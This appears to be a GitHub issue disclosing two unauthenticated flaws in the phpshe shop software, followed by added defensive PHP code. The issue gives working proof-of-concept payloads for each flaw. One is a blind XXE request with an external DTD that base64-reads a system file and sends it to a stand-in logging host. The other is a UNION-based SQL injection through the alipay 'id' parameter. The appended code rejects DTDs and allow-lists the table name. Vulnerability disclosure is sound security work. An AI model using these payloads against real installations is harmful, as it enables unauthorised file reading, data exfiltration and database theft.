koyshe / phpshe

Two vulnerabilities without authentication

Open
wps2015

0x01 blind XXE in /include/plugin/payment/wechat/notify_url.php

The XXE vulnerability is located in include/plugin/payment/wechat/notify_url.php, where the wechat_getxml function is called.

The wechat_getxml function is defined in hook/wechat.hook.php, which then calls the pe_getxml function.

The pe_getxml function is defined in include/function/global.func.php. The simplexml_load_string() function is called to parse the XML from php://input. If the libxml version is < 2.9.0, simplexml_load_string() will parse external entities in its default mode.

The PoC is as below:

/phpshe1.7/include/plugin/payment/wechat/notify_url.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
...
Content-Type: application/xml
Content-Length: 257

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://yoursite.com/test.dtd">
%dtd;
]>
<roottag>&send;</roottag>

test.dtd:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://dnslog.com/?%file;'>">
%all;

We can use it to read any file in the system.

0x02 SQL Injection in include/plugin/payment/alipay/pay.php with parameter id

The vulnerability is located in include/plugin/payment/alipay/pay.php and $order_id can be controlled.


Then the return value of order_table will be directly spliced into the SQL statement as the table name.

So the PoC is as below:

/include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12%23_

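As an added example that is not part of the issue or of phpshe's code, the defensive counterparts to both findings: an XML parser that refuses DTDs and external entity loading in place of a bare simplexml_load_string(), and an allow-list check for a table name derived from request input. The function names and the allow-list contents are assumptions.

```php
<?php
// Added example, not phpshe's own code. Names (safe_parse_xml,
// validated_order_table) and the allow-list are assumptions.

// 0x01: parse an untrusted XML callback body without resolving external
// entities, as a hardened replacement for a bare simplexml_load_string().
function safe_parse_xml(string $xml): ?SimpleXMLElement
{
    // A payment notification never needs a DTD: reject any DOCTYPE or
    // ENTITY declaration outright, which removes parameter-entity tricks.
    if (stripos($xml, '<!DOCTYPE') !== false || stripos($xml, '<!ENTITY') !== false) {
        return null;
    }
    // Before libxml 2.9.0 external entity loading is on by default; on PHP
    // versions where the toggle is still needed (< 8.0), switch it off.
    $prevLoader = null;
    if (PHP_VERSION_ID < 80000) {
        $prevLoader = libxml_disable_entity_loader(true);
    }
    $prevErrors = libxml_use_internal_errors(true);
    // LIBXML_NONET forbids any network access while parsing; LIBXML_NOENT is
    // deliberately not passed, so entity references are never substituted.
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prevErrors);
    if ($prevLoader !== null) {
        libxml_disable_entity_loader($prevLoader);
    }
    return $doc === false ? null : $doc;
}

// 0x02: a table name derived from request input must never reach the query
// unless it matches a fixed allow-list; return null instead of the raw value.
function validated_order_table(string $candidate): ?string
{
    $allowed = ['pay', 'order']; // constructed allow-list; adapt to the schema
    return in_array($candidate, $allowed, true) ? $candidate : null;
}

// Constructed inputs: a benign callback body, a DTD-carrying body, a valid
// table name and the injected table name from the alipay PoC.
$benign = '<?xml version="1.0"?><xml><out_trade_no>1</out_trade_no></xml>';
var_dump(safe_parse_xml($benign) instanceof SimpleXMLElement);
var_dump(safe_parse_xml('<!DOCTYPE r [<!ENTITY % d SYSTEM "http://x/">%d;]><r/>'));
var_dump(validated_order_table('pay'));
var_dump(validated_order_table('pay` where 1=1 union select 1#_'));
```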
